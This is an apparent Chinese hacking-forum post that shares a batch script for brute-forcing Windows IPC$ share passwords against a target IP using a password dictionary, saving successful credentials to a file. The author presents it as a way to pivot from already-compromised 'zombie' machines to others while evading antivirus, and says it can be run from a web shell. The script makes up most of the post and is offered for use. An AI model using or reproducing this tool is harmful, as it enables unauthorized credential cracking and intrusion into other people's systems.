作者：TheLostMind

有时候在肉鸡下面想整个其他的肉鸡，用SOCK5反向代理，麻烦又慢，有N多线程的IPC$密码破解工具，无奈别人装着杀软哇，做个免杀忒麻烦，大可不必动用牛刀，一点点软给我们提供了N多命令行工具，直接上个批处理脚本，如果被杀了是你人品问题，哈哈：

看了一晚上，在获取程序返回码的地方出了点差错，害得我去看MSDN，哎~~~先贴代码吧，不敢独自享用，送给大坏蛋们，O(∩_∩)O哈哈~

====================IPCPASSWORDCRACK.BAT==================================

@echo off
cls
Title Now Cracking ******
setlocal enabledelayedexpansion
set line=1
echo Useage: %0 IP Username Passwordfile.txt
echo.
FOR /F "eol=; tokens=1,2,3* delims=, " %%i in (%3) do (
set /a line+=1
cls
echo Cracked Passwords: !line!
echo Cracking %1 with user:"%2" and pssword: "%%i"
net use \\%1\ipc$ "%%i" /user:"%2"
IF NOT errorlevel 1 (
Title Password Cracke Over !!!
net use \\%1\ipc$ /del
echo IP: %1 UserNmae: %2 Password: %%i >>cracked.txt
cls
echo Password Cracked Successfully!
echo.
echo IP: %1
echo UserNmae：%2
echo Password：%%i
echo.
Echo Result Write to file:cracked.txt
goto :eof
)
net use * /del /y
cls
echo Password Not Fund!
echo Change Your Dictionary And Try Again!
echo.
)

=============================================================================

用法：把上面的代码保存成bat格式的文件，比如crack.bat,命令行下：crack.bat IP 用户名 密码字典.txt（随便改了一下，上次的输出内容太混乱了）

这个东西放到SHELL里面就可以跑密码哦，嘿嘿，顺便啰嗦一下，errorlevel 这个是返回码，是返回上一句执行结果的标识，具体的看你执行的什么东东了哦，我开始搞错了，多了一条语句，后来发现测试不成功，N久没弄批处理 ，累死朕了，哎~~~~